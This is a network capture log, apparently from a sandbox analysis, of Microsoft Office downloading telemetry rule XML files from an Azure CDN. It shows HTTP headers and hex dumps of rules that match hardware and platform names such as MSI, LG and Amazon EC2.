                                                                                                                                      2024-11-29 22:11:17 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      64192.168.2.44981613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:17 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 478
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                      x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221118Z-174f7845968zgtf6hC1EWRqd8s0000000tbg00000000qxag
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:18 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      65192.168.2.44981713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:18 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:18 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 404
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                      x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221118Z-174f7845968xr5c2hC1EWRd0hn0000000hdg000000006qfs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:18 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      66192.168.2.44982113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:20 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 425
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                      x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f7845968kvnqxhC1EWRmf3g0000000m9g00000000e4xu
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      67192.168.2.44981913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:20 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 400
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                      x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht4000000104g00000000pfvp
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:20 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      68192.168.2.44982013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:20 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                      x-ms-request-id: 26935917-f01e-0003-011b-414453000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht4000000105000000000nv78
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      69192.168.2.44982213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:20 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                      x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f7845968zgtf6hC1EWRqd8s0000000th0000000006c8x
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:20 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      70192.168.2.44981813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:20 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                      x-ms-request-id: 490736a9-701e-0097-7e01-42b8c1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221120Z-174f78459684bddphC1EWRbht400000010ag000000004qta
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      71192.168.2.44982313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:22 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 448
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                      x-ms-request-id: c6635303-801e-0083-091e-41f0ae000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968jrjrxhC1EWRmmrs00000010t0000000000z43
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:22 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      72192.168.2.44982413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:22 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 491
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                      x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968j6t2phC1EWRcfe800000010q000000000agdk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:22 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      73192.168.2.44982513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:22 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                      x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968psccphC1EWRuz9s00000010qg00000000m98k
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
